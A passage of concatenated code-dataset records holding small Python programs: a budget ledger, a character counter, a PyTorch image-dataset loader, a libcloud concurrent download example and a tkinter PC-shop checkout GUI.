resize_colobar(None)\n\n\nananas = ani.FuncAnimation(fig,animate,35,interval=700,blit=False)\nananas.save('olr_full.mp4')\nplt.show()\n","repo_name":"sylviasullivan/ice-microp-rad","sub_path":"rad/olr_video3.py","file_name":"olr_video3.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73042221227","text":"class Category:\n #I hate problems like these\n def __init__(self, category):\n self.dep_amount = 0.0\n self.wit_amount = 0.0\n self.name = category\n self.ledger = []\n \n def __str__(self):\n s = f\"{self.name:*^30}\\n\"\n\n for item in self.ledger:\n s_desc = item['description']\n s += f\"{s_desc[:23]:<23}\"+f\"{item['amount']:>7.2f}\\n\"\n s += \"Total: \"+str(self.get_balance())\n\n return s\n\n def deposit(self, amount, desc=''):\n dep = dict()\n dep['amount'] = amount\n dep['description'] = desc\n\n self.ledger.append(dep)\n\n self.dep_amount = self.dep_amount + amount\n\n def get_balance(self):\n return (self.dep_amount-self.wit_amount)\n\n def check_funds(self, amount):\n return(self.get_balance()>=amount)\n\n def withdraw(self, amount, desc=''):\n if self.check_funds(amount) == False:\n return False\n\n wit = dict()\n wit['amount'] = (amount*(-1))\n wit['description'] = desc\n\n self.ledger.append(wit)\n\n self.wit_amount = self.wit_amount + amount\n\n return True\n\n def transfer(self,amount, account):\n if self.check_funds(amount) is False:\n return False\n else:\n self.withdraw(amount, f\"Transfer to {account.name}\")\n account.deposit(amount, f\"Transfer from {self.name}\")\n return True\n\ndef rounded(num):\n rounder = 10\n return (num*rounder)/rounder\n\ndef percentages(l_categories):\n total = 0\n cat_withdrew = []\n cat_wit_percent = []\n\n for category in l_categories:\n total += category.wit_amount\n cat_withdrew.append(category.wit_amount)\n\n for i in range(len(cat_withdrew)):\n num = rounded(cat_withdrew[i]/total)\n cat_wit_percent.append(num)\n return cat_wit_percent\n\ndef create_spend_chart(categories):\n #head of visual\n header = \"Percentage spent by category\\n\"\n \n #graph portion\n graph_str = ''\n index = 100\n percents = percentages(categories)\n \n while index >= 0:\n #inital spaces in graph from side index percentages\n graph = \" \"\n for percent in percents:\n if percent * 100 >= index:\n graph += \"o \"\n else:\n graph += \" \"\n index_str = str(index)\n graph_str += f\"{index_str:>3}|\"+graph+\"\\n\"\n #intervals of 10 for percent index\n index-=10\n \n #3 --- for each category name + '-' for the ending....don't forget initial spacing\n underline = \" -\" + \"---\"*len(categories)+\"\\n\"\n \n #last portion of string \n names = []\n\n for category in categories:\n names.append(category.name)\n #max with key arg key=len retrieves largest item from a list\n max_str = len(max(names, key=len))\n #create vertical lines length of longest...5 spaces to start\n vert_names = ' '\n \n for i in range(max_str):\n for name in names:\n if i >= len(name):\n #blank space for when no letter\n vert_names += \" \"\n else:\n #add letter when index is within name length\n vert_names += name[i] + \" \"\n #newline for every iteration of loop till end\n if(i != max_str -1 ):\n #add 5 spaces after \\n for intial line spacing\n vert_names += '\\n '\n\n\n #string construction of parts\n return header+graph_str+underline+vert_names","repo_name":"FuzzyWombatt/FCC-python-scientific-computing","sub_path":"budget-app/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21027927259","text":"'''This program will count each characters appearance in the file passed'''\ndef char_count(file):\n dictionary={}\n with open(file,'r') as f:\n data=f.read()\n char_tuple=tuple(data)\n for entry in char_tuple:\n if entry not in dictionary.keys():\n dictionary[entry]=1\n else:\n dictionary[entry]+=1\n for k,v in dictionary.items():\n print (\"character {} is : {} times\".format(k,v))\n \nchar_count('readme.txt')\n","repo_name":"dheepan2/python_projects","sub_path":"character_count.py","file_name":"character_count.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34245753351","text":"import fnmatch\nimport os\n\nimport numpy as np\n\nfrom PIL import Image, ImageDraw\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, SubsetRandomSampler, DataLoader\n\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\nimport random\n\n\nclass LisaDataset(Dataset):\n def __init__(self, img_dir, lab_dir, max_lab, img_size, shuffle=True, transform=None):\n self.img_dir = img_dir\n self.lab_dir = lab_dir\n self.img_size = img_size\n self.shuffle = shuffle\n self.img_names = self.get_image_names()\n self.img_paths = self.get_image_paths()\n self.lab_paths = self.get_lab_paths()\n self.max_n_labels = max_lab\n self.transform = transform\n\n def __len__(self):\n return len(self.img_names)\n\n def __getitem__(self, idx):\n assert idx <= len(self), 'index range error'\n img_path = os.path.join(self.img_dir, self.img_names[idx])\n lab_path = os.path.join(self.lab_dir, self.img_names[idx]).replace('.jpg', '.txt').replace('.png', '.txt')\n image = Image.open(img_path).convert('RGB')\n if os.path.getsize(lab_path): # check to see if label file contains data.\n label = np.loadtxt(lab_path)\n else:\n label = np.ones([5])\n\n label = torch.from_numpy(label).float()\n if label.dim() == 1:\n label = label.unsqueeze(0)\n\n # image, label = self.pad_and_scale(image, label)\n if self.transform:\n image = self.transform(image)\n\n label = self.pad_lab(label)\n return image, label, self.img_names[idx]\n\n def get_image_names(self):\n png_images = fnmatch.filter(os.listdir(self.img_dir), '*.png')\n jpg_images = fnmatch.filter(os.listdir(self.img_dir), '*.jpg')\n n_png_images = len(png_images)\n n_jpg_images = len(jpg_images)\n n_images = n_png_images + n_jpg_images\n n_labels = len(fnmatch.filter(os.listdir(self.lab_dir), '*.txt'))\n assert n_images == n_labels, \"Number of images and number of labels don't match\"\n return png_images + jpg_images\n\n def get_image_paths(self):\n img_paths = []\n for img_name in self.img_names:\n img_paths.append(os.path.join(self.img_dir, img_name))\n return img_paths\n\n def get_lab_paths(self):\n lab_paths = []\n for img_name in self.img_names:\n lab_path = os.path.join(self.lab_dir, img_name).replace('.jpg', '.txt').replace('.png', '.txt')\n lab_paths.append(lab_path)\n return lab_paths\n\n def pad_and_scale(self, img, lab):\n w, h = img.size\n if w == h:\n padded_img = img\n else:\n dim_to_pad = 1 if w < h else 2\n if dim_to_pad == 1:\n padding = (h - w) / 2\n padded_img = Image.new('RGB', (h, h), color=(255, 255, 255))\n padded_img.paste(img, (int(padding), 0))\n lab[:, [1]] = (lab[:, [1]] * w + padding) / h\n lab[:, [3]] = (lab[:, [3]] * w / h)\n else:\n padding = (w - h) / 2\n padded_img = Image.new('RGB', (w, w), color=(255, 255, 255))\n padded_img.paste(img, (0, int(padding)))\n lab[:, [2]] = (lab[:, [2]] * h + padding) / w\n lab[:, [4]] = (lab[:, [4]] * h / w)\n resize = transforms.Resize((self.img_size, self.img_size))\n padded_img = resize(padded_img) # choose here\n\n return padded_img, lab\n\n def pad_lab(self, lab):\n pad_size = self.max_n_labels - lab.shape[0]\n if pad_size > 0:\n padded_lab = F.pad(lab, [0, 0, 0, pad_size], value=-1)\n else:\n padded_lab = lab\n return padded_lab\n\n\nclass SplitDataset:\n def __init__(self, img_dir, lab_dir, max_lab, img_size, transform=None):\n self.dataset = LisaDataset(img_dir=img_dir,\n lab_dir=lab_dir,\n max_lab=max_lab,\n img_size=img_size,\n transform=transform)\n self.img_dir = img_dir\n\n def __call__(self, val_split, test_split, shuffle_dataset, random_seed, batch_size, ordered, *args, **kwargs):\n if not ordered:\n dataset_size = len(self.dataset)\n indices = list(range(dataset_size))\n val_split = int(np.floor(val_split * dataset_size))\n test_split = int(np.floor(test_split * dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices = indices[val_split + test_split:]\n val_indices = indices[:val_split]\n test_indices = indices[val_split:val_split + test_split]\n else:\n train_indices = []\n val_indices = []\n test_indices = []\n all_videos = self.get_frames_per_video()\n num_of_videos = len(all_videos)\n for idx, image in enumerate(os.listdir(self.img_dir)):\n video_name = image.split('.avi_')[0]\n if all_videos[video_name] < int((1 - val_split - test_split) * num_of_videos):\n train_indices.append(idx)\n elif all_videos[video_name] < int((1 - val_split) * num_of_videos):\n val_indices.append(idx)\n else:\n test_indices.append(idx)\n np.random.shuffle(train_indices)\n np.random.shuffle(val_indices)\n np.random.shuffle(test_indices)\n\n # Creating PT data samplers and loaders:\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n test_sampler = SubsetRandomSampler(test_indices)\n\n train_loader = DataLoader(self.dataset, batch_size=batch_size, sampler=train_sampler)\n validation_loader = DataLoader(self.dataset, batch_size=batch_size, sampler=valid_sampler)\n test_loader = DataLoader(self.dataset, sampler=test_sampler)\n\n return train_loader, validation_loader, test_loader\n\n def get_frames_per_video(self):\n videos = dict()\n idx = 1\n for image in os.listdir(self.img_dir):\n video_name = image.split('.avi_')[0]\n if video_name not in videos.keys():\n videos[video_name] = 1\n idx += 1\n indices_list = [i for i in range(idx)]\n for key, value in videos.items():\n rand_value = random.choice(indices_list)\n videos[key] = rand_value\n indices_list.remove(rand_value)\n return videos\n\n\nclass SplitDataset1:\n def __init__(self, img_dir_train_val, lab_dir_train_val, img_dir_test, lab_dir_test, max_lab, img_size, transform=None):\n self.dataset_train_val = LisaDataset(img_dir=img_dir_train_val,\n lab_dir=lab_dir_train_val,\n max_lab=max_lab,\n img_size=img_size,\n transform=transform)\n self.dataset_test = LisaDataset(img_dir=img_dir_test,\n lab_dir=lab_dir_test,\n max_lab=max_lab,\n img_size=img_size,\n transform=transform)\n self.img_dir = img_dir_train_val\n\n def __call__(self, val_split, test_split, shuffle_dataset, random_seed, batch_size, *args, **kwargs):\n train_indices = []\n val_indices = []\n all_videos = self.get_frames_per_video()\n num_of_videos = len(all_videos)\n for idx, image in enumerate(os.listdir(self.img_dir)):\n video_name = image.split('.avi_')[0]\n if all_videos[video_name] < int((1 - val_split) * num_of_videos):\n train_indices.append(idx)\n else:\n val_indices.append(idx)\n np.random.shuffle(train_indices)\n np.random.shuffle(val_indices)\n\n # Creating PT data samplers and loaders:\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n train_loader = DataLoader(self.dataset_train_val, batch_size=batch_size, sampler=train_sampler)\n validation_loader = DataLoader(self.dataset_train_val, batch_size=batch_size, sampler=valid_sampler)\n test_loader = DataLoader(self.dataset_test)\n\n return train_loader, validation_loader, test_loader\n\n def get_frames_per_video(self):\n videos = dict()\n idx = 1\n for image in os.listdir(self.img_dir):\n video_name = image.split('.avi_')[0]\n if video_name not in videos.keys():\n videos[video_name] = 1\n idx += 1\n indices_list = [i for i in range(idx)]\n for key, value in videos.items():\n rand_value = random.choice(indices_list)\n videos[key] = rand_value\n indices_list.remove(rand_value)\n return videos\n\n\ndef main():\n img_dir = '../datasets/lisa/images'\n lab_dir = '../datasets/lisa/annotations'\n test_data_loader = torch.utils.data.DataLoader(LisaDataset(img_dir=img_dir,\n lab_dir=lab_dir,\n max_lab=14,\n img_size=416),\n batch_size=3,\n shuffle=True)\n\n for i_batch, (img_batch, lab_batch) in enumerate(test_data_loader):\n for lab in lab_batch:\n print(lab)\n plt.imshow(img_batch[0].permute(1, 2, 0))\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AlonZolfi/transparent_patch","sub_path":"patch/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":9922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23689259862","text":"import os.path\n\nfrom gevent import monkey # pylint: disable=import-error\nfrom gevent.pool import Pool # pylint: disable=import-error\n\nfrom libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n\nmonkey.patch_all()\n\n\nUSERNAME = \"username\"\nAPI_KEY = \"api key\"\n\ncls = get_driver(Provider.CLOUDFILES_US)\ndriver = cls(USERNAME, API_KEY)\n\n\ndef download_obj(container, obj):\n driver = cls(USERNAME, API_KEY)\n obj = driver.get_object(container_name=container.name, object_name=obj.name)\n filename = os.path.basename(obj.name)\n path = os.path.join(os.path.expanduser(\"~/Downloads\"), filename)\n print(\"Downloading: {} to {}\".format(obj.name, path))\n obj.download(destination_path=path)\n\n\ncontainers = driver.list_containers()\n\njobs = []\npool = Pool(20)\n\nfor index, container in enumerate(containers):\n objects = container.list_objects()\n\n for obj in objects:\n pool.spawn(download_obj, container, obj)\n\npool.join()\nprint(\"Done\")\n","repo_name":"apache/libcloud","sub_path":"docs/examples/storage/concurrent_file_download_using_gevent.py","file_name":"concurrent_file_download_using_gevent.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"34318028209","text":"from tkinter import * #imports tkinter lib\nimport tkinter.messagebox #imports tkinter messagebox from tkinter lib\n\naddtocart = [] #empty list for total quantity in shopping cart\nquadstellar = [] #empty list for quantity of specified item\nmoonrock = []\nsnowflake = []\nboomer = []\ninterstellar = []\nnasasuper = []\nheatwave = []\nzoomer = []\nquantity = [1] #list used to append 1 item to each respective cart\nprice = [2800, 4000, 1000, 900] #list for prices\n\ndef clearcart(): #function to clear cart after pressing clear cart button on home page (OKASHA)\n quadstellar.clear() #clears each respective list\n moonrock.clear()\n snowflake.clear()\n boomer.clear()\n interstellar.clear()\n nasasuper.clear()\n heatwave.clear()\n zoomer.clear()\n addtocart.set(0) #resets cart to 0 because this is set as an IntVar, so we cannot use clear command\n \ndef menu(): #function for the sidebar menu\n def sidebarhide(): #function to hide the sidebar(HARNOOR)\n sidebarlol = Label(app, width=33, height=41, bg=\"AntiqueWhite3\").place(relx=0.0096, rely=0.40) #label that had a bg of white that covers the sidebar\n sidebar = Button(app, text=\"=\", width=25, height=1, bg=\"#383838\", command=menu, fg=\"white\", font=(\"Calibri\", 13, \"bold\")) #sidebar button which makes the side bar appear and disappear\n sidebar.place(relx=0.01, rely=0.350) #coordinates for sidebar\n product = Label(app, width=500, height=310, bg=\"AntiqueWhite3\").place(relx=0.165, rely=0.335) #label that hides products\n \n def pcs(): #function for PC products(HARNOOR)\n pc = PhotoImage(file = \"pc1.png\", height=300) #imports image for first pc\n w = Label(app, image = pc) #creates a label for the image so we can use it to edit dimensions and properties\n w.place(relx=0.165, rely=0.350) #coords for image\n w.photo = pc \n pc = Label(app, text=\"Quadstellar\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\")) #adds label of our product name\n pc.place(relx=0.165, rely=0.350) #coords for product name\n pctext = Label(app, text=\"Price: $2800\", width=33, font=(\"Calibri\", 13, \"bold\")) #prices(appearance only)\n pctext.place(relx=0.165, rely=0.650) #coords for prices\n pctext2 = Label(app, text=\"Intel Core i7 8700K\\n RTX 2060 Super\\n DDR4 16GB 3200Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\")) #PC specs\n pctext2.place(relx=0.165, rely=0.690) #pc specs coords\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty1, font=(\"Calibri\", 13, \"bold\")) #add to cart button which appends to the main cart, and the secondary product cart which is used for the checkout screen to see how much of what you ordered\n cartbutton.place(relx=0.165, rely=0.790)\n \n pc = PhotoImage(file = \"pc2.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.365, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Moonrock\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.365, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $4000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.365, rely=0.650)\n pctext2 = Label(app, text=\"AMD Threadripper 2950X\\n RTX 2080Ti\\n DDR4 64GB 3200Mhz\\n 2TB SSD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.365, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty2, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.365, rely=0.790)\n \n pc = PhotoImage(file = \"pc3.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.565, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Snowflake\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.565, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $1000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.565, rely=0.650)\n pctext2 = Label(app, text=\"AMD Ryzen 7 2700x\\n RTX 2060 OC\\n DDR4 16GB 3200Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.565, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty3, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.565, rely=0.790)\n \n pc = PhotoImage(file = \"pc4.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.765, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Boomer\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.765, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $900\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.765, rely=0.650)\n pctext2 = Label(app, text=\"AMD Ryzen 5 1600\\n GTX 1660Ti\\n DDR4 8GB 3200Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.765, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty4, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.765, rely=0.790)\n \n Button(app, text=\"Checkout\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=checkoutscreen, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.240) #checkout button which opens checkout screen\n Button(app, text=\"Clear Cart\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=clearcart, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.205) #clear cart button which clears the main and secondary carts\n \n Label(app, text=\"Items In Cart:\", width=11, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.917, rely=0.285) \n Label(app, textvariable = addtocart, width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.960, rely=0.285) #label which shows the total number of items in the cart\n \n def laptops(): #same things as PCs(OKASHA)\n pc = PhotoImage(file = \"laptop1.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.165, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Interstellar\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.165, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $2800\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.165, rely=0.650)\n pctext2 = Label(app, text=\"Intel Core i5 6700K\\n GTX 1060Ti\\n DDR4 16GB 3000Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.165, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty5, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.165, rely=0.790)\n \n pc = PhotoImage(file = \"laptop2.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.365, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"NASA Super\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.365, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $4000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.365, rely=0.650)\n pctext2 = Label(app, text=\"AMD Threadripper 2950X\\n RTX 2080Ti\\n DDR4 64GB 3200Mhz\\n 2TB SSD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.365, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty6, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.365, rely=0.790)\n \n pc = PhotoImage(file = \"laptop3.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.565, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Heatwave\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.565, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $1000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.565, rely=0.650)\n pctext2 = Label(app, text=\"AMD Ryzen 5 1600g\\n GTX 1050Ti OC\\n DDR4 8GB 3000Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.565, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty7, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.565, rely=0.790)\n \n pc = PhotoImage(file = \"laptop4.png\", height=300)\n w = Label(app, image = pc)\n w.place(relx=0.765, rely=0.350)\n w.photo = pc\n pc = Label(app, text=\"Zoomer\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n pc.place(relx=0.765, rely=0.350)\n pc.pack\n pctext = Label(app, text=\"Price: $900\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.765, rely=0.650)\n pctext2 = Label(app, text=\"AMD Ryzen 5 1600\\n GTX 950Ti\\n DDR4 8GB 3000Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.765, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty8, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.765, rely=0.790)\n \n Button(app, text=\"Checkout\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=checkoutscreen, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.240)\n Button(app, text=\"Clear Cart\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=clearcart, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.205)\n \n Label(app, text=\"Items In Cart:\", width=11, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.917, rely=0.285)\n Label(app, textvariable = addtocart, width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.960, rely=0.285)\n\n sidebarlol = Label(app, width=33, height=41, bg=\"#383838\").place(relx=0.0096, rely=0.40)\n button2 = Button(app, text=\"=\", width=25, height=1, bg=\"#383838\", command=sidebarhide, fg=\"white\", font=(\"Calibri\", 13, \"bold\")) #button which hides the sidebar\n button2.place(relx=0.01, rely=0.350)\n \n gaming = Button(app, text=\"Gaming PCs\", width=23, height=1, bg=\"#ffa500\", fg=\"#383838\", borderwidth=3, relief=\"solid\", command=pcs, font=(\"Calibri\", 13, \"bold\")) #button that shows pc products\n gaming.place(relx=0.0145, rely=0.410)\n \n laptop = Button(app, text=\"Laptops\", width=23, height=1, bg=\"#ffa500\", fg=\"#383838\", borderwidth=3, relief=\"solid\", command=laptops, font=(\"Calibri\", 13, \"bold\")) #button that shows laptop products\n laptop.place(relx=0.0145, rely=0.470)\n\napp = Tk() #main form for main menu(HARNOOR AND OKASHA)\napp.title(\"APC - A PC BUILT LIKE A TANK\") #title for main form\napp.state(\"zoomed\") #basically makes the form fullscreen automatically\napp.resizable(0,0) #makes it so you cannot resize the form\napp.config(bg=\"AntiqueWhite3\") #bg of form\nlogo = PhotoImage(file = \"logo.png\", height=350) #photo that displays our logo at the top header\nw = Label(app, image = logo)\nw.photo = logo\nw.pack()\n\nsidebar = Button(app, text=\"=\", width=23, height=1, bg=\"#383838\", command=menu, fg=\"white\", font=(\"Calibri\", 13, \"bold\")) #sidebar button which opens and closes sidebar\nsidebar.place(relx=0.01, rely=0.350)\n\naddtocart = IntVar() #makes addtocart an intvar\naddtocart.set(0) #sets add to cart to 0 because it is an intvar\n\ndef checkoutscreen(): #function for our checkout screen (HARNOOR)\n global e1 #globals our entry boxes which basically makes them visible to the entire code\n global e2\n global e3\n global e4\n global e5\n global e6\n global e7\n global e8\n global e9\n global e10\n global e11\n global e12\n global chk\n chk = Tk() #form for our checkout screen\n chk.title(\"Checkout\")\n chk.geometry(\"800x800+540+120\") #the size of our checkout screen which makes it centered as well\n chk.config(bg=\"#383838\")\n chk.resizable(0,0) \n \n Label(chk, width=3, height=100, bg=\"white\").place(relx=0.37, rely=0.298)\n Label(chk, text= \"View Order\", bg=\"orange\", width=\"500\", height=\"8\", font=(\"Calibri\", 18, \"bold\")).pack()\n Label(chk, text= \"Quantity:\", bg=\"orange\", width=8, height=2, font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.320)\n Label(chk, text = sum(quadstellar), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.375) #label which includes the sum of items in the quadstellar cart, we basically made multiple lists or carts for each product so we can show the user how much of what they ordered and then eventually give them a total.\n Label(chk, text = sum(moonrock), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.425)\n Label(chk, text = sum(snowflake), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.475)\n Label(chk, text = sum(boomer), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.525)\n Label(chk, text = sum(interstellar), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.575)\n Label(chk, text = sum(nasasuper), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.625)\n Label(chk, text = sum(heatwave), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.675)\n Label(chk, text = sum(zoomer), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.725)\n Label(chk, text= \"Item:\", bg=\"orange\", width=15, height=2, font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.320)\n Label(chk, text = \"Quadstellar\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.375)\n Label(chk, text = \"Moonrock\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.425)\n Label(chk, text = \"Snowflake\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.475)\n Label(chk, text = \"Boomer\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.525)\n Label(chk, text = \"Interstellar\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.575)\n Label(chk, text = \"NasaSuper\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.625)\n Label(chk, text = \"Heatwave\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.675)\n Label(chk, text = \"Zoomer\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.725)\n Label(chk, text= \"Price:\", bg=\"orange\", width=10, height=2, font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.320)\n Label(chk, text = sum(quadstellar)*(price[0]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.375) #label which multiplies the quantity of the item and its respective price\n Label(chk, text = sum(moonrock)*(price[1]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.425)\n Label(chk, text = sum(snowflake)*(price[2]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.475)\n Label(chk, text = sum(boomer)*(price[3]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.525)\n Label(chk, text = sum(interstellar)*(price[0]), width=10, height=2, borderwidth=3, relief=\"solid\", 